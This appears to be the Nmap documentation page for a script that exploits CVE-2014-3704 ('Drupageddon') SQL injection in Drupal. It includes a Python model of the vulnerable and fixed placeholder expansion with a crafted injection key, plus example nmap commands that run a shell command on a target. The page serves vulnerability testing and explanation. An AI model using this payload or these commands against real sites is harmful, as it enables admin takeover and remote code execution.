Categories: vuln, intrusive, exploit
Exploits CVE-2014-3704, also known as 'Drupageddon', in Drupal. Versions of Drupal core earlier than 7.32 are affected.
The vulnerability allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
The script injects a new Drupal administrator user via the login form and then attempts to log in as this user to determine whether the target is vulnerable. If it is, the following exploitation steps are performed:
- the PHP filter module, which allows embedded PHP code/snippets to be evaluated, is enabled,
- the permission to use PHP code is granted to administrator users,
- a new article containing the payload is created and previewed,
- cleanup: by default, all DB records that were added or modified by the script are restored.
The vulnerability was originally discovered by Stefan Horst from SektionEins.
The exploitation technique used to achieve RCE on the target is based on the exploit/multi/http/drupal_drupageddon Metasploit module.
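The sentence above about "an array containing crafted keys" and the login-form step are the whole mechanism of the bug, so here is a small model of it. This is an added example, not code from Drupal or from the Nmap script: it re-implements in Python the shape of Drupal 7's expandArguments() placeholder expansion (a simplified model, not the original PHP), once as it behaved before 7.32 and once with the 7.32 fix of iterating over the re-indexed values (array_values()) instead of the caller-supplied keys. LOGIN_QUERY, the argument dicts and the stacked UPDATE statement are constructed for illustration; the example builds and inspects the SQL string only and executes nothing.

```python
import re

# Constructed query of the kind Drupal 7 runs to look up the submitted
# username on login (illustrative; not copied from Drupal).
LOGIN_QUERY = "SELECT * FROM {users} WHERE name = :name AND status = 1"

# A normal login form posts name=alice, which arrives as a string argument.
NORMAL_ARGS = {":name": "alice"}

# The CVE-2014-3704 trick: posting name[<key>]=x makes the argument an array
# whose KEYS the attacker chooses. PHP parses
#   name[0 ;UPDATE {users} SET status = 1 WHERE uid = 1;#]=x&name[0]=x
# into {"0 ;UPDATE ... ;#": "x", 0: "x"}. The stacked UPDATE is a constructed
# stand-in, not the script's real payload.
CRAFTED_ARGS = {
    ":name": {"0 ;UPDATE {users} SET status = 1 WHERE uid = 1;#": "x", 0: "x"}
}


def expand_arguments_vulnerable(query, args):
    """Simplified model of the pre-7.32 expandArguments() logic.

    Each array-valued placeholder :key is rewritten into :key_<i> for every
    element, where <i> is the array KEY. Because the key comes straight from
    the request, its text is pasted into the SQL string unescaped.
    """
    out_args = dict(args)
    for key, data in args.items():
        if not isinstance(data, dict):
            continue
        new_keys = {f"{key}_{i}": value for i, value in data.items()}
        # Replace ':name' (whole word) with ':name_<k1>, :name_<k2>, ...'.
        query = re.sub(re.escape(key) + r"\b",
                       lambda _m: ", ".join(new_keys), query)
        del out_args[key]
        out_args.update(new_keys)
    return query, out_args


def expand_arguments_fixed(query, args):
    """Same expansion with the 7.32 fix: iterate over the VALUES re-indexed
    from zero (PHP's array_values()), so <i> is always 0, 1, 2, ... and the
    attacker-controlled keys never reach the SQL string."""
    out_args = dict(args)
    for key, data in args.items():
        if not isinstance(data, dict):
            continue
        new_keys = {f"{key}_{i}": value
                    for i, value in enumerate(data.values())}
        query = re.sub(re.escape(key) + r"\b",
                       lambda _m: ", ".join(new_keys), query)
        del out_args[key]
        out_args.update(new_keys)
    return query, out_args


PLACEHOLDER_RE = re.compile(r"^:[A-Za-z_][A-Za-z0-9_]*$")


def unsafe_placeholders(expanded_args):
    """Return expanded placeholder names that are not plain identifiers.
    Any hit means request-controlled text was spliced into the query."""
    return [name for name in expanded_args if not PLACEHOLDER_RE.match(name)]


if __name__ == "__main__":
    for label, fn in (("vulnerable", expand_arguments_vulnerable),
                      ("fixed", expand_arguments_fixed)):
        q, a = fn(LOGIN_QUERY, CRAFTED_ARGS)
        print(f"{label}: {q}")
        print(f"  unsafe placeholders: {unsafe_placeholders(a)}")
```

With the crafted input the vulnerable expansion yields "... name = :name_0 ;UPDATE {users} SET status = 1 WHERE uid = 1;#, :name_0 AND status = 1", i.e. a second statement stacked behind the SELECT, while the fixed expansion yields "... name = :name_0, :name_1 AND status = 1" with the attacker's key text confined to the bound values. Whether a stacked statement actually executes depends on the database driver; the string is what the page's exploit relies on reaching the database unchanged.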
http-vuln-cve2014-3704.uri: Drupal root directory on the website. Default: /
http-vuln-cve2014-3704.cmd: Shell command to execute. Default: nil
http-vuln-cve2014-3704.cleanup: Indicates whether cleanup (removing DB records that were added/modified during the exploitation phase) is performed. Default: true
slaxml.debug: See the documentation for the slaxml library.
http.host, http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent: See the documentation for the http library.
smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername: See the documentation for the smbauth library.
vulns.short, vulns.showall: See the documentation for the vulns library.
nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.cmd="uname -a",http-vuln-cve2014-3704.uri="/drupal" <target>
nmap --script http-vuln-cve2014-3704 --script-args http-vuln-cve2014-3704.uri="/drupal",http-vuln-cve2014-3704.cleanup=false <target>
PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-vuln-cve2014-3704:
|   VULNERABLE:
|   Drupal - pre Auth SQL Injection Vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-3704
|       The expandArguments function in the database abstraction API in
|       Drupal core 7.x before 7.32 does not properly construct prepared
|       statements, which allows remote attackers to conduct SQL injection
|       attacks via an array containing crafted keys.
|
|     Disclosure date: 2014-10-15
|     Exploit results:
|       Linux debian 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64 GNU/Linux
|     References:
|       https://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html
|       https://www.drupal.org/SA-CORE-2014-005
|       http://www.securityfocus.com/bid/70595
|_      https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-3704
License: Same as Nmap--See https://nmap.org/book/man-legal.html